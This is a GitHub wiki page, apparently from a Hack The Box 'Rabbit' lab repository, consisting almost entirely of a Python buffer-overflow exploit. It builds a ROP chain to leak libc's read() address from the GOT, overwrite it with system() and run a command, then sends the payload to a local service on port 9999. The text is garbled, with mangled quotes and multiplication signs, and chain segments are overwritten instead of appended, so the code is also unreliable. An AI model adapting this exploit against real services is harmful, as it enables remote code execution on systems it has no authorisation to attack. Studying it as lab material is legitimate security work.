Smashitup - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
import requests

#cmd = sys.argv1+"\0"
cmd = โ€˜lsโ€™

#payload for Option 1: GET request, needs some filler or err โ€“ โ€˜Aโ€™ * 4 to be taken off buffer
payload = rโ€™http://localhost:9999/\AAAAโ€™

#Payload for Option 2: CURL
#payload = โ€™โ€™

#filler โ€“ fill buffer with Aโ€™s , thought this would be 536 โ€“ 4, but turns out to be 535
payload += โ€˜Aโ€™ * (535 โ€“ 4)

#overwrite RBX โ€“ offset 536
payload += โ€˜Bโ€™ * 8

#overwrite RBP โ€“ offset 544
payload += โ€˜Cโ€™ * 8

#fill before start of RSP โ€“ offset 568
payload += โ€˜Dโ€™ * 16

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(โ€œ<Iโ€, 0ร—000400cf0) #read() call loc
someother += struct.pack(โ€œ<Iโ€, 0ร—000401787) #PPPR
someother += struct.pack(โ€œ<Iโ€, 0) #stdin
someother += struct.pack(โ€œ<Iโ€, 0ร—000602e28) #.dynamic addr
someother += struct.pack(โ€œ<Iโ€, len(cmd)) #len of cmd

#leak address of read() in randomised libc
someother += struct.pack(โ€œ<Iโ€, 0ร—400c50) #write() call loc
someother += struct.pack(โ€œ<Iโ€, 0ร—000401787) #PPPR
someother += struct.pack(โ€œ<Iโ€, 1) #stdout
someother += struct.pack(โ€œ<Iโ€, 0ร—000603088) #read() in GOT
someother += struct.pack(โ€œ<Iโ€, 8) #len

#call read@plt to overwrite the ptr stored in GOT
someother = struct.pack(โ€œ<Iโ€, 0ร—000400cf0) #read() call loc
someother += struct.pack(โ€œ<Iโ€, 0ร—000401787) #PPPR
someother += struct.pack(โ€œ<Iโ€, 0) #stdin
someother += struct.pack(โ€œ<Iโ€, 0ร—000603088) #read() in GOT
someother += struct.pack(โ€œ<Iโ€, 8) #len

#call read@plt with address of system() in libc
someother = struct.pack(โ€œ<Iโ€, 0ร—000400cf0) #read() call loc
someother += โ€˜FFFFFFFFโ€™ # bogus
someother += struct.pack(โ€œ<Iโ€, 0ร—000602e28) #.dynamic addr system()

#padding โ€“ continue filler, writing into RSP
#payload += โ€˜Eโ€™ * 135
payload = payload + someother
payload += โ€˜Eโ€™ * (135 โ€“ len(someother))

  1. Payload delivery Option1: requests.get #
    r = requests.get(payload)
    print(r.status_code)
    print(len(payload))
    printยฎ
  1. Payload delivery Option2: system cmd curl #
    #print(โ€œSending payload of total length {}โ€.format(len(payload)))
    #system(โ€œ/usr/bin/curl -g localhost:9999/\โ€" +payload + โ€œ\โ€")
โš ๏ธ **GitHub.com Fallback** โš ๏ธ